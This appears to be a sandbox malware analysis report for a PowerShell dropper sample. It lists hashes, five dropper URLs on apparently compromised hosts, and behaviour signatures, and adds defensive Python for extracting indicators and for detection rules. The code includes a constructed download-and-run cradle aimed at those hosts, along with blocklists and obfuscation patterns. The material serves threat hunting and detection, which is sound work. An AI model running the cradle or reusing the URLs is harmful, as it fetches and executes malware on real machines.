General

  • Target

    5363d121f8a11e509b99ce2734c313a2_JaffaCakes118

  • Size

    78KB

  • Sample

    240518-hapc7sga24

  • MD5

    5363d121f8a11e509b99ce2734c313a2

  • SHA1

    7710969f61d0f501dddeb143c42d0b6df3198a0e

  • SHA256

    cf187c7e1b979a14bbea861c7521838c0108c65c0f82465c0a30cddf16f4bea6

  • SHA512

    3831de3b76fa0244782d512087c6caa3e562786fbfcfcce55f9fe51677939ce720c8f3f709aebd7b6db019cb5d9c153a3c24635b5541c7ed1963357d0164de36

  • SSDEEP

    1536:SptJlmrJpmxlRw99NBk+aHyU4rTDUdUNAMeWT:Ote2dw99fq4r3UdqAMe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs (type: exe.dropper)

  • http://blog.bctianfu.cn/4
  • http://mail.vcacademy.lk/5nLo
  • http://lamemoria.in/2ib2Pt
  • http://tropicalislandrealtyofflorida.com/NNqM7W
  • http://businessarbitr.ru/E
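The extracted config is a set of five exe.dropper URLs, the shape produced by a PowerShell download cradle that tries each URL in turn until one download succeeds. The script below is an added example, not the sample's own PowerShell and not Triage's extractor: it pulls the URLs out of a constructed cradle of that shape (the cradle text, the proxy log lines, the IP addresses and the example.org/example.com hosts are made up here; only the five URLs come from the config above), splits each into the host and path indicators a blocklist keys on, defangs them for a report, and checks the constructed proxy log against the dropper hosts.

```python
import re
from urllib.parse import urlsplit

# Constructed sample of a '@'-joined download cradle (not the page's script).
# Only the five URLs are taken from the extracted config above.
SAMPLE_CRADLE = (
    "$w=New-Object System.Net.WebClient;"
    "$u='http://blog.bctianfu.cn/4@http://mail.vcacademy.lk/5nLo@"
    "http://lamemoria.in/2ib2Pt@http://tropicalislandrealtyofflorida.com/NNqM7W@"
    "http://businessarbitr.ru/E'.Split('@');"
    "$p=$env:temp+'\\'+[System.IO.Path]::GetRandomFileName()+'.exe';"
    "foreach($s in $u){try{$w.DownloadFile($s,$p);Invoke-Item $p;break}catch{}}"
)

# Stop at quotes, whitespace and the '@' separator so adjacent URLs are not merged.
URL_RE = re.compile(r"https?://[^\s'\"@;()<>]+", re.IGNORECASE)


def extract_urls(script: str) -> list[str]:
    """Return the distinct URLs found in a deobfuscated script, in first-seen order."""
    urls = []
    for match in URL_RE.finditer(script):
        url = match.group(0).rstrip(".,")
        if url not in urls:
            urls.append(url)
    return urls


def to_iocs(urls: list[str]) -> list[dict]:
    """Split each URL into the host and path indicators a blocklist or hunt keys on."""
    return [{"url": u, "host": urlsplit(u).hostname, "path": urlsplit(u).path} for u in urls]


def defang(url: str) -> str:
    """Render a URL safe to paste into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


# Constructed proxy log lines (Squid-style access.log); the second one fetches a dropper URL.
SAMPLE_PROXY_LOG = [
    "1716000001.104 215 10.0.0.5 TCP_MISS/200 5120 GET http://www.example.org/ - HIER_DIRECT/93.184.216.34 text/html",
    "1716000002.377 310 10.0.0.5 TCP_MISS/200 78541 GET http://mail.vcacademy.lk/5nLo - HIER_DIRECT/203.0.113.9 application/octet-stream",
    "1716000003.512 180 10.0.0.7 TCP_MISS/200 2048 GET http://www.example.com/ - HIER_DIRECT/93.184.216.34 text/html",
]


def match_proxy_log(lines: list[str], iocs: list[dict]) -> list[tuple[str, str]]:
    """Return (host, line) for every log line whose request URL points at a dropper host."""
    hosts = {i["host"] for i in iocs}
    hits = []
    for line in lines:
        for token in line.split():
            if token.lower().startswith("http"):
                host = urlsplit(token).hostname
                if host in hosts:
                    hits.append((host, line))
                break  # the first URL token on a line is the request URL
    return hits


if __name__ == "__main__":
    found = extract_urls(SAMPLE_CRADLE)
    for ioc in to_iocs(found):
        print(defang(ioc["url"]), ioc["host"], ioc["path"])
    for host, line in match_proxy_log(SAMPLE_PROXY_LOG, to_iocs(found)):
        print("HIT", host, "->", line.split()[6])
```

Matching on the host rather than the full URL is deliberate: the path component of these droppers is rotated freely, while the compromised hosts tend to be reused across a campaign.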

Targets

    • Target

      5363d121f8a11e509b99ce2734c313a2_JaffaCakes118

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
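The three signatures above are process-tree and command-line checks. The code below is an added example of how such rules are expressed, not Triage's detection logic: it runs three simple rules over constructed Sysmon-style process-create and network-connect events. The Office-parent/script-host pairing, the network blocklist, the caret-count threshold and the encoded-command check are assumptions, and the file paths, command lines, base64 blob and destination hosts in the sample events are made up.

```python
from dataclasses import dataclass

# Assumed pairing: Office applications should not spawn script hosts.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Assumed blocklist: living-off-the-land binaries that should rarely originate network traffic.
NET_BLOCKLIST = {"powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                 "certutil.exe", "bitsadmin.exe"}


@dataclass
class Event:
    """Minimal Sysmon-style event: kind is 'process' (event 1) or 'network' (event 3)."""
    kind: str
    image: str
    parent: str = ""
    cmdline: str = ""
    dest: str = ""


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def unexpected_child(ev: Event) -> bool:
    """Office parent spawning a script host ('Process spawned unexpected child process')."""
    return (ev.kind == "process"
            and basename(ev.parent) in OFFICE_APPS
            and basename(ev.image) in SCRIPT_HOSTS)


def blocklisted_network(ev: Event) -> bool:
    """Blocklisted binary opening a network connection."""
    return ev.kind == "network" and basename(ev.image) in NET_BLOCKLIST


def obfuscated_cmdline(ev: Event, caret_threshold: int = 5) -> bool:
    """Heuristic (an assumption, not Triage's rule): caret-escaped tokens or an
    encoded PowerShell command in a cmd.exe/powershell.exe command line."""
    if ev.kind != "process" or basename(ev.image) not in {"cmd.exe", "powershell.exe"}:
        return False
    lower = ev.cmdline.lower()
    encoded = " -e " in lower or "-enc" in lower
    return ev.cmdline.count("^") >= caret_threshold or encoded


def evaluate(events: list[Event]) -> list[tuple[int, str]]:
    """Run every rule over every event; return (event index, signature name) pairs."""
    findings = []
    for idx, ev in enumerate(events):
        if unexpected_child(ev):
            findings.append((idx, "Process spawned unexpected child process"))
        if blocklisted_network(ev):
            findings.append((idx, "Blocklisted process makes network request"))
        if obfuscated_cmdline(ev):
            findings.append((idx, "Obfuscated command line"))
    return findings


# Constructed chain: Word -> caret-obfuscated cmd.exe -> encoded PowerShell -> connection
# to a dropper host, followed by two benign browser events that must not fire.
ENCODED = "JABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0AA=="  # constructed placeholder blob
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\cmd.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -e " + ENCODED),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\cmd.exe", "powershell -nop -w hidden -e " + ENCODED),
    Event("network", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          dest="mail.vcacademy.lk:80"),
    Event("process", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          r"C:\Windows\explorer.exe", "chrome.exe"),
    Event("network", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          dest="www.example.org:443"),
]

if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The caret heuristic catches the `p^o^w^e^r^s^h^e^l^l` style of cmd.exe obfuscation, where carets are stripped by the parser but defeat naive string matching; the encoded-command check catches the second stage regardless of how the first stage was written.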

MITRE ATT&CK Enterprise v15

Tasks